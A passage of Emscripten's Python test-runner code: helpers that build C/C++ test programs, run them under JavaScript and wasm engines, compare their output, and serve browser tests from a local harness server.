self.uses_es6 = False
self.js_engines = list(config.JS_ENGINES)
self.wasm_engines = list(config.WASM_ENGINES)
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR is set we still try to start with an empty directory, as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
elif type(value) == str:
ret += ['-s', f'{key}={value}']
else:
ret += ['-s', f'{key}={json.dumps(value)}']
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once it's available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
try:
shared.run_process(es_check + ['es5', os.path.abspath(filename)], stderr=PIPE, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stderr)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False,
post_build=None, js_outfile=True):
suffix = '.js' if js_outfile else '.wasm'
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
compiler = [EMXX]
else:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# We link with C++ stdlibs, even when linking with emcc for historical reasons. We can remove
# this if that issue is fixed.
compiler = [EMCC, '-nostdlib++']
if force_c:
compiler.append('-xc')
dirname, basename = os.path.split(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + include for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and not self.uses_es6:
self.verify_es5(output)
if post_build:
post_build(output)
if js_outfile and self.uses_memory_init_file():
src = open(output).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
error = None
if not engine:
engine = config.JS_ENGINES[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
if EMTEST_VERBOSE:
print(f"Running '{filename}' under '{shared.shlex_join(engine)}'")
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would be nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
self.fail('subprocess exited with non-zero return code(%d): `%s`' %
(e.returncode, shared.shlex_join(cmd)))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
# exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under a browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-s', 'SIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE')
original_args = list(self.emcc_args)
extra_args = ['libb' + so, 'libc' + so]
self.emcc_args += extra_args
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.emcc_args = original_args
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = self.js_engines
for engine in js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
with open(filename, 'w') as f:
f.write(src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, open(expected_output_filename).read(), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
outfile = shared.unsuffixed(srcfile) + '.out'
expected = open(outfile).read()
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, post_build=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
self.build(filename, libraries=libraries, includes=includes, post_build=post_build,
force_c=force_c)
js_file = shared.unsuffixed(os.path.basename(filename)) + '.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party', 'freetype', 'include'),
'-I' + test_file('third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(test_file('browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT macros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open('reftest.js', 'w') as out:
with open(test_file('browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
